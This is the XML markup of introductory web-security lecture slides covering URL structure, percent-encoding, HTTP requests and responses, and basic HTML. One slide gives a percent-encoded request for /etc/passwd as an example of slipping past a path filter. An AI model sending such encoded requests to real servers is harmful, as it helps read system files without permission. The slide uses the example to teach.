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59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F23E48-BBB6-4CF5-8DF9-8C28CEC27F89}">
  <a:tblStyle styleId="{B0F23E48-BBB6-4CF5-8DF9-8C28CEC27F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2"/>
    <p:restoredTop sz="94704"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="175" d="100"/>
          <a:sy n="175" d="100"/>
        </p:scale>
        <p:origin x="162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ae44d037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ae44d037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ae44d037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ae44d037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ae44d03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ae44d037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e44d037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ae44d037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ae44d037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ae44d037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d695f33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d695f33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d695f331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d695f331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4d33b6cf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4d33b6cf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d695f33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d695f33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d695f331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d695f331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2ed6162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2ed6162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d695f331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d695f331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d695f331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d695f331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df063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df063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/>
              <a:t> repo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4d33b6cf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4d33b6cf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4d33b6cfd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4d33b6cfd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d695f331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d695f331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d695f331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d695f331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d695f331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d695f331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d695f331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d695f331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d695f33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d695f33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33b6c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d33b6c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d695f360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d695f360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d695f360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d695f360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d695f360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d695f360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d695f360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d695f360b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d695f360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d695f360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d695f360b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d695f360b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d695f360b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d695f360b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d695f360b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d695f360b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d695f360b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dd695f360b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d695f360b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d695f360b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ce61f0a8f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ce61f0a8f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d695f360b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dd695f360b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d695f360b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d695f360b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d695f360b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dd695f360b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d695f360b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d695f360b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d695f360b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d695f360b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d695f360b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dd695f360b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d695f360b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d695f360b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d695f360b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d695f360b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dd695f360b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dd695f360b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d695f360b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d695f360b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e61f0a8f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ce61f0a8f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d695f360b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d695f360b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d695f360b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d695f360b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dd695f360b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dd695f360b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d695f360b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d695f360b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dd695f33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dd695f33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d695f36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dd695f36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d695f36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d695f36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d695f360b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dd695f360b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ae44d03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ae44d03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ae44d03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ae44d03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ae44d037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ae44d037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ae44d03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ae44d03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5B0B6E5B-08BE-3EE4-9E49-B14CC8E96740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oon.cs161.org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n.cs161.org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s161.org/phishing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Web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8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="152" idx="3"/>
            <a:endCxn id="153" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2221263" y="4036375"/>
            <a:ext cx="42834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Web?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Web (World Wide Web)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A collection of data and services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and services are provided by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>web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and services are accessed using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>web browsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (e.g. Chrome, Firefox)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is not the Internet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Internet describes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> data is transported between servers and browsers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study the Internet later in the networking unit</a:t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1113063" y="3097450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1113063" y="3769675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1113063" y="4441900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6504738" y="3433563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6504738" y="4105788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160" name="Google Shape;160;p28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="157" idx="3"/>
            <a:endCxn id="159" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2221263" y="3364150"/>
            <a:ext cx="42834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1" name="Google Shape;161;p28"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="158" idx="3"/>
            <a:endCxn id="153" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2221263" y="4372600"/>
            <a:ext cx="42834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2" name="Google Shape;162;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2221425" y="4627625"/>
            <a:ext cx="4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URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: How do we uniquely identify a piece of data on the web?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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: How do web browsers communicate with web servers?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HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A markup language for creating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CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A programming language for running code in the web browser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URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: How do we uniquely identify a piece of data on the web?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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: How do web browsers communicate with web servers?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HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A markup language for creating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CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A programming language for running code in the web browser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URL (Uniform Resource Locator)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A string that uniquely identifies one piece of data on the web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type of URI (Uniform Resource Identifier)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Scheme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8227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just before the double slashes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how to retrieve the data over the Internet (which Internet protocol to use)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Protocols you should know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/>
              <a:t>: Hypertext Transfer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/>
              <a:t>: A secure version of HTTP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see more about these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protocols include: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ftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: File Transfer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/>
              <a:t>: fetching a local file (e.g. on your computer)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git+ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: an SSH-tunneled git fetch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don't need to know the details about these protocols</a:t>
            </a:r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Domain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Located after the double slashes, but before the next single slash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Defines which web server to contact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Recall: The web has many web servers. The location specifies which one we're looking for.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Written as several phrases separated by dots</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Google Shape;20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Location</a:t>
            </a:r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Location: The domain with some additional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Username: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evanbot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@cs161.org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Identifies one specific user on the web server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Rarely seen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toon.cs161.org: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Identifies one specific application on the web server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will see ports again in the networking unit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Path</a:t>
            </a:r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after the first single slash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which file on the web server to fetch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of the web server as having its own filesystem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path represents a filepath on the web server's filesystem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https://toon.cs161.org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/xorcist/avian.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Look in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xorcist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> folder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avian.html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https://toon.cs161.org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/>
              <a:t>: Return the root directory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Query</a:t>
            </a:r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a query is optional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after a question mark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Supplies arguments to the web server for processing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of the web server as offering a function at a given path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access this function, a user makes a request to the path, with some arguments in the query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server runs the function with the user's arguments and returns the result to the user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 are supplied as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name=value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> pairs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 are separated with ampersands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/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Google Shape;22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Midterm on Friday 7-9PM PT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HW 3 due Monday, October 10th—extended!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Lab portion—start early!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Fragment</a:t>
            </a:r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Providing a fragment is optional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Located after a hash sign (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 sent to the web server! Only used by the web browser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Common usage: Tells the web browser to scroll to a part of a webpage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Usage: Supplies content to code in the web browser (JavaScript) without sending the content to the server</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;23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734450" y="4455775"/>
            <a:ext cx="752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r>
              <a:rPr lang="en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cryptoverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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characters#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en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mallory</a:t>
            </a:r>
            <a:endParaRPr sz="1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Escaping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URLs are designed to contain printable, human-readable characters (ASCII)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want to include non-printable characters in the URL?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URLs have special characters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want to use a special character in the URL?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URL encoding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Notation: Percent sign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/>
              <a:t>) followed by the hexadecimal value of the character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%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> = 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' (spacebar)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%35</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> = 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/>
              <a:t>' (hash sign)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%50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> = 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/>
              <a:t>' (printable characters can be encoded too!)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issues: makes scanning for malicious URLs harder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Suppose you want to block all requests to the path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an attacker makes a request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%2F%65%74%63%2F%70%61%73%73%77%64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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study this issue more later</a:t>
            </a:r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40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4028613" y="2611475"/>
            <a:ext cx="4212350" cy="1017600"/>
            <a:chOff x="4028613" y="2611475"/>
            <a:chExt cx="4212350" cy="1017600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="250" name="Google Shape;250;p40"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4732767" y="3177200"/>
              <a:ext cx="101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51" name="Google Shape;251;p40"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4028613" y="3425350"/>
              <a:ext cx="171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52" name="Google Shape;252;p40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5744363" y="2935475"/>
              <a:ext cx="2496600" cy="693600"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 20419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func draw(bot, size)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 search(q)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3" name="Google Shape;253;p40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5744363" y="2611475"/>
              <a:ext cx="249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Backend</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Google Shape;254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Simplified View of the Web</a:t>
            </a:r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56" name="Google Shape;256;p40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485038" y="2258875"/>
            <a:ext cx="10254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257" name="Google Shape;257;p40"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="256" idx="3"/>
            <a:endCxn id="258" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510438" y="2566525"/>
            <a:ext cx="5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59" name="Google Shape;259;p40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2040238" y="1104775"/>
            <a:ext cx="3239100" cy="2599500"/>
            <a:chOff x="2040238" y="1104775"/>
            <a:chExt cx="3239100" cy="2599500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="258" name="Google Shape;258;p40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2040238" y="1428775"/>
              <a:ext cx="3239100" cy="2275500"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 6309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/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├── /pictures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    ├── evanbot.jpg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└── codabot.jpg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├── /secrets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├── passwords.txt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└── evanbot.py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├── /draw?bot=__&amp;size=__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└── /search?q=__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0" name="Google Shape;260;p40"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2040238" y="1104775"/>
              <a:ext cx="323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Filesystem</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="261" name="Google Shape;261;p40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2040238" y="3737100"/>
            <a:ext cx="6200700" cy="400200"/>
            <a:chOff x="2040238" y="3737100"/>
            <a:chExt cx="6200700" cy="400200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="262" name="Google Shape;262;p40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2040238" y="3737100"/>
              <a:ext cx="6200700" cy="400200"/>
              <a:chOff x="2040238" y="3737100"/>
              <a:chExt cx="6200700" cy="400200"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="263" name="Google Shape;263;p40"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2040238" y="3737100"/>
                <a:ext cx="6200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</a:rPr>
                  <a:t>Server: </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="dk1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>www.</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en" b="1" dirty="0" err="1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evanbot.com</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="264" name="Google Shape;264;p40"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="263" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2040238" y="3937200"/>
                <a:ext cx="1968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65" name="Google Shape;265;p40"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="263" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6272938" y="3937200"/>
              <a:ext cx="196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Simplified View of the Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Google Shape;27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72" name="Google Shape;272;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485038" y="2258875"/>
            <a:ext cx="10254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273" name="Google Shape;273;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2040238" y="1428775"/>
            <a:ext cx="3239100" cy="2275500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 630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/pictures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evanbot.jpg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├── /secrets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├── passwords.txt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evanbot.py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├── /draw?bot=__&amp;size=__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└── /search?q=__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4" name="Google Shape;274;p41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="272" idx="3"/>
            <a:endCxn id="273" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510438" y="2566525"/>
            <a:ext cx="529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5" name="Google Shape;275;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2040238" y="3737100"/>
            <a:ext cx="620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Server: www.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evanbot.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="276" name="Google Shape;276;p41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732767" y="3177200"/>
            <a:ext cx="101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7" name="Google Shape;277;p41"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028613" y="3425350"/>
            <a:ext cx="171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8" name="Google Shape;278;p41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5744363" y="2935475"/>
            <a:ext cx="2496600" cy="693600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 204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func draw(bot, size)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 search(q)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9" name="Google Shape;279;p41"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="275" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2040238" y="3937200"/>
            <a:ext cx="19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41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2040238" y="1104775"/>
            <a:ext cx="32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Filesystem</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Google Shape;281;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5744363" y="2611475"/>
            <a:ext cx="24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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Google Shape;282;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426125" y="4214225"/>
            <a:ext cx="49011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can request a file from the server with a URL.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283" name="Google Shape;283;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838450" y="4578650"/>
            <a:ext cx="47223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https://evanbot.com/pictures/evanbot.jpg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4" name="Google Shape;284;p41"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="275" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6272938" y="3937200"/>
            <a:ext cx="19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Simplified View of the Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="Google Shape;29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91" name="Google Shape;291;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485038" y="2258875"/>
            <a:ext cx="10254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292" name="Google Shape;292;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2040238" y="1428775"/>
            <a:ext cx="3239100" cy="2275500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 630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/pictures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├── evanbot.jpg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codabot.jpg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/secrets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├── passwords.txt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evanbot.py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/draw?bot=__&amp;size=__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└── /search?q=__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3" name="Google Shape;293;p42"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="291" idx="3"/>
            <a:endCxn id="292" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1510438" y="2566525"/>
            <a:ext cx="529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4" name="Google Shape;294;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2040238" y="3737100"/>
            <a:ext cx="620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Server: www.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evanbot.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="295" name="Google Shape;295;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4732767" y="3177200"/>
            <a:ext cx="1011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6" name="Google Shape;296;p42"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028613" y="3425350"/>
            <a:ext cx="171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7" name="Google Shape;297;p42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5744363" y="2935475"/>
            <a:ext cx="2496600" cy="693600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 204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 draw(bot, size)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 search(q)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8" name="Google Shape;298;p42"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="294" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2040238" y="3937200"/>
            <a:ext cx="19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42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2040238" y="1104775"/>
            <a:ext cx="32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Filesystem</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Google Shape;300;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5744363" y="2611475"/>
            <a:ext cx="24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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="Google Shape;301;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426125" y="4214225"/>
            <a:ext cx="53181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can also request some computation from the server.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Google Shape;302;p42"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838450" y="4578650"/>
            <a:ext cx="50436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https://evanbot.com/draw?bot=evan&amp;size=large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3" name="Google Shape;303;p42"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="294" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6272938" y="3937200"/>
            <a:ext cx="19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315" name="Google Shape;315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b="1">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: How do we uniquely identify a piece of data on the web?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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: How do web browsers communicate with web servers?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HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A markup language for creating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CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A programming language for running code in the web browser</a:t>
            </a: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 (Hypertext Transfer Protocol)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A protocol used to request and retrieve data from a web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HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A secure version of HTTP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cryptography to secure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see HTTPS later in the networking unit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is a request-response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browser sends a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to the web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server processes the request and sends a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> to the web browser</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Google Shape;32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an HTTP Request</a:t>
            </a:r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 path (possibly with query parameters)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GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Requests that don’t change server-side state (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>” information from the server)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POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Request that update server-side state (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>” information to the server)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less-used methods exist (e.g. HEAD, PUT)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Today, GET requests typically modify server-side state in some ways (e.g. analytics), but using GET instead of POST can have security implications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requests do not contain any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 requests can contain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Uninteresting metadata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Headers: Metadata about the request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“This request is coming from a Firefox browser”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Protocol: “HTTP” and version</a:t>
            </a:r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an HTTP Response</a:t>
            </a:r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37" name="Google Shape;337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Protocol: “HTTP” and version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Status code: A number indicating what happened with the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200 OK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403 Access forbidden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404 Page not found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a webpage, image, audio, PDF, executable,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Uninteresting metadata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Headers: Metadata about the response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Date and time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Length of the content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Introduction to Web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history of the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web?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a Webpage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on the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Same-Origin Policy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Webpage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Google Shape;34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349" name="Google Shape;349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b="1">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: How do we uniquely identify a piece of data on the web?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b="1">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: How do web browsers communicate with web servers?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HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A markup language for creating webpages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CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A style sheet language for defining the appearance of webpages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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: A programming language for running code in the web browser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0" name="Google Shape;35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56" name="Google Shape;356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HTML (Hypertext Markup Language)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: A markup language to create structured documents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elements on a webpage with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>tags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are defined with angle brackets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&lt;img&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> tag creates images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/>
              <a:t> tag creates bold text</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Google Shape;35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2" name="Google Shape;362;p51"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1162750" y="3162000"/>
            <a:ext cx="0" cy="5952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Create a Link</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Google Shape;36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65" name="Google Shape;365;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595050" y="1557625"/>
            <a:ext cx="66894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&lt;a href="https://toon.cs161.org"&gt;Check out these comics!&lt;/a&gt;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51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
